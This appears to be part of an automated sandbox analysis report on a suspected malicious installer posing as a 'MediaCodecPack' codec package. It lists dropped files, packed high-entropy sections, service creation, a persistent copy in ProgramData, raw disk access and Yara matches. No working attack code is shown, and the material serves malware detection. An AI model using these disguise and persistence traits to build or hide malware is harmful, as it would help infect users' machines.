                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_00401CF9
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0046E0E4 GetVersion,CoCreateInstance
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_00401951 GetLocalTime,StartServiceCtrlDispatcherA,lstrcmpiW
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_00401951 GetLocalTime,StartServiceCtrlDispatcherA,lstrcmpiW
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_0040DEE9 StartServiceCtrlDispatcherA
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\Programs
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | File created: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp
                    Source: Yara match | File source: 3.0.mediacodecpack.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000001.00000002.2736047862.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000000.1493879108.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara match | File source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-K5SAB.tmp, type: DROPPED
                    Source: Yara match | File source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File read: C:\Windows\win.ini
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                    Source: mediacodecpack.exe, mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: mediacodecpack.exe, mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.dr | Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: mediacodecpack.exe, mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.dr | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: Hbq580QZAR.exe | ReversingLabs: Detection: 18%
                    Source: Hbq580QZAR.exe | String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                    Source: Hbq580QZAR.exe | String found in binary or memory: /LOADINF="filename"
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | File read: C:\Users\user\Desktop\Hbq580QZAR.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\Hbq580QZAR.exe "C:\Users\user\Desktop\Hbq580QZAR.exe"
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Process created: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp "C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp" /SL5="$1042E,3196748,56832,C:\Users\user\Desktop\Hbq580QZAR.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Process created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Process created: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp "C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp" /SL5="$1042E,3196748,56832,C:\Users\user\Desktop\Hbq580QZAR.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Process created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: msacm32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: riched20.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: usp10.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: msls31.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: explorerframe.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: sfc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Section loaded: sfc_os.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: sqlite3.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: appxsip.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: opcservices.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1Jump to behavior
                    Source: Hbq580QZAR.exeStatic file information: File size 3445716 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-FG1GT.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-38DHO.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-FG1GT.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-L8DJ5.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-38DHO.tmp.1.dr

                    Data Obfuscation

                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Unpacked PE file: 3.2.mediacodecpack.exe.400000.0.unpack .aitt4:ER;.ajtt4:R;.aktt4:W;.rsrc:R;.altt4:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Unpacked PE file: 3.2.mediacodecpack.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004502C0
                    Source: initial sample | Static PE information: section where entry point is pointing to: .aitt4
                    Source: mediacodecpack.exe.1.dr | Static PE information: section name: .aitt4
                    Source: mediacodecpack.exe.1.dr | Static PE information: section name: .ajtt4
                    Source: mediacodecpack.exe.1.dr | Static PE information: section name: .aktt4
                    Source: mediacodecpack.exe.1.dr | Static PE information: section name: .altt4
                    Source: is-L8DJ5.tmp.1.dr | Static PE information: section name: Shared
                    Source: is-FD66D.tmp.1.dr | Static PE information: section name: /4
                    Source: is-FD66D.tmp.1.dr | Static PE information: section name: /19
                    Source: is-FD66D.tmp.1.dr | Static PE information: section name: /35
                    Source: is-FD66D.tmp.1.dr | Static PE information: section name: /51
                    Source: is-FD66D.tmp.1.dr | Static PE information: section name: /63
                    Source: is-FD66D.tmp.1.dr | Static PE information: section name: /77
                    Source: is-FD66D.tmp.1.dr | Static PE information: section name: /89
                    Source: is-FD66D.tmp.1.dr | Static PE information: section name: /102
                    Source: is-FD66D.tmp.1.dr | Static PE information: section name: /113
                    Source: is-FD66D.tmp.1.dr | Static PE information: section name: /124
                    Source: MediaCodecPack.exe.3.dr | Static PE information: section name: .aitt4
                    Source: MediaCodecPack.exe.3.dr | Static PE information: section name: .ajtt4
                    Source: MediaCodecPack.exe.3.dr | Static PE information: section name: .aktt4
                    Source: MediaCodecPack.exe.3.dr | Static PE information: section name: .altt4
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /4
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /19
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /35
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /51
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /63
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /77
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /89
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /102
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /113
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /124
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0040994C push 00409989h; ret 1_2_00409981
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00483F88 push 00484096h; ret 1_2_0048408E
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax 1_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_004104E0 push ecx; mov dword ptr [esp], edx 1_2_004104E5
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00412928 push 0041298Bh; ret 1_2_00412983
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00494CAC push ecx; mov dword ptr [esp], ecx 1_2_00494CB1
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0040CE38 push ecx; mov dword ptr [esp], edx 1_2_0040CE3A
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_004592D0 push 00459314h; ret 1_2_0045930C
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0040F398 push ecx; mov dword ptr [esp], edx 1_2_0040F39A
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00443440 push ecx; mov dword ptr [esp], ecx 1_2_00443444
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0040546D push eax; ret 1_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00485678 push ecx; mov dword ptr [esp], ecx 1_2_0048567D
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_004517F8 push 0045182Bh; ret 1_2_00451823
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_004519BC push ecx; mov dword ptr [esp], eax 1_2_004519C1
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00477B08 push ecx; mov dword ptr [esp], edx 1_2_00477B09
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00419C28 push ecx; mov dword ptr [esp], ecx 1_2_00419C2D
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0045FD1C push ecx; mov dword ptr [esp], ecx 1_2_0045FD20
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00499D30 pushad ; retf 1_2_00499D3F
                    Source: mediacodecpack.exe.1.dr | Static PE information: section name: .aitt4 entropy: 7.742728051481311
                    Source: MediaCodecPack.exe.3.dr | Static PE information: section name: .aitt4 entropy: 7.742728051481311

                    Persistence and Installation Behavior

                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_02D4E8A7
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-FG1GT.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_shfoldr.dll
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | File created: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\is-TV2PJ.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-L8DJ5.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\unins000.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\sqlite3.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-38DHO.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy)
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | File created: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe
